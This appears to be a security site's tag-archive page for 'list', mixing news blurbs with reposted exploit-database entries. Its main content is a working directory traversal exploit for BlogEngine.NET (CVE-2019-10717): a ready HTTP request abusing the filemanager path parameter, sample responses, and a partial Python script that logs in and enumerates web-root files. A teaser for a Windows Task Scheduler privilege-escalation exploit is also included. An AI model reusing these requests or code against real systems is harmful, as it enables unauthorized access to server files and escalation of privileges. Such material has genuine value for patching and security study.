Tag: list

Shades of BlueKeep: Wormable Remote Desktop Bugs Top August Patch Tuesday List
august patch tuesday, Black Hat 2019

The flaws allow remote code-execution without user interaction or authentication, and are highly exploitable.

New Cyber Threat list released by Cloud Security Alliance
cloud computing, cloud security

Cloud Security Alliance (CSA) has released a list of 11 cyber threats facing users of cloud computing, identifying data breaches as the ...

Industry Groups Share Anti-Piracy Wish List With US Government
afeat, Creative Future

Earlier this month, the US Department of Commerce requested input from the public on several piracy-related matters. Specifically, it wanted to know more about counterfeit ...

Possible list of domestic software for mandatory pre-installation published
hacker, SecurityLAB

Specialists of the Internet Development Institute analyzed the market of domestic mobile software. This month a bill was introduced in the State Duma of the ...

Microsoft asked to join a closed list of Linux developers
hacker, SecurityLAB

Organizations from the list exchange data about vulnerabilities before they are published. Microsoft has applied to be included in the list of Linux distribution developers who ...

Local - Privilege Escalation Exploits, Local Exploit

BlogEngine.NET 3.3.6/3.3.7 – 'path' Directory Traversal

- Exploit Details

# Exploit Title: Directory Traversal on BlogEngine.NET
# Date: 24 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: //blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10717

1. Description
==============

BlogEngine.NET is vulnerable to a directory traversal. The page parameter, passed to /api/filemanager, reveals the contents of the directory.

2. Proof of Concept
=============

Log in to the application and submit a GET request to /api/filemanager:

Request:

~~~
GET /api/filemanager?path=/../../ HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: $COOKIE
Connection: close
Upgrade-Insecure-Requests: 1
~~~

Depending on how the request is submitted, the response may be XML or JSON

XML Response

~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 01:58:46 GMT
Connection: close
Content-Length: 13030

5/14/2019 6:58:46 PM Directory ~/App_Data/files/../.. false … 0 …
~~~

JSON Response

~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 02:35:13 GMT
Connection: close
Content-Length: 10011

[
    {
        "IsChecked":false,
        "SortOrder":0,
        "Created":"5/14/2019 7:35:13 PM",
        "Name":"…",
        "FileSize":"",
        "FileType":0,
        "FullPath":"~/App_Data/files/../..",
        "ImgPlaceholder":""
    }
    …
~~~

~~~
import argparse
import json
import os
import re
import requests
import sys

"""
Exploit for CVE-2019-10717

CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop

Outputs list of filenames found in web root

python exploit.py -t $RHOST

?path=/../..
/../../archive.aspx
/../../archive.aspx.cs
/../../archive.aspx.designer.cs
/../../BlogEngine.NET.csproj
/../../BlogEngine.NET.csproj.user
/../../contact.aspx
/../../contact.aspx.cs
/../../contact.aspx.designer.cs
"""

urls = {
    "login": "/Account/login.aspx",
    "traversal": "/api/filemanager"
}

def make_request(session, method, target, data={}):
    proxies = {
        "http": "127.0.0.1:8080",
        "https": "127.0.0.1:8080"
    }
    if method == 'GET':
        r = requests.Request(method, target, params=data)
    elif method == 'POST':
        r = requests.Request(method, target, data=data)
    prep = session.prepare_request(r)
    resp = session.send(prep, verify=False, proxies=proxies)
    return resp.text

def login(session, host, user, passwd):
    resp = make_request(session, 'GET', host+urls.get('login'))
    login_form = re.findall('', resp)
    login_data = dict([(i[0],i) for i in login_form])
    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
    resp = make_request(session, 'POST', host+urls.get('login'), login_data)

def parse(body, path, outfile):
    paths = json.loads(body)
    ...
~~~

Operators of Triton malware added power companies to their list of targets
hacker, SecurityLAB

Previously, the group's interests were oil and gas enterprises. The hacker group Xenotime, linked by security experts to malware attacks for the Triton process control ...

Roskomnadzor included the Tinder dating app on the ARI list
hacker, SecurityLAB

The service is obliged to keep the users' correspondence for half a year and provide data upon the request of law enforcement agencies. Roskomnadzor entered ...

remote code execution

Microsoft Windows (x86) – Task Scheduler '.job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation

- Exploit Details

Task Scheduler .job import arbitrary DACL write

Tested on: Windows 10 32-bit

Bug information: There are two folders for tasks.

c:\windows\tasks
c:\windows\system32\tasks ...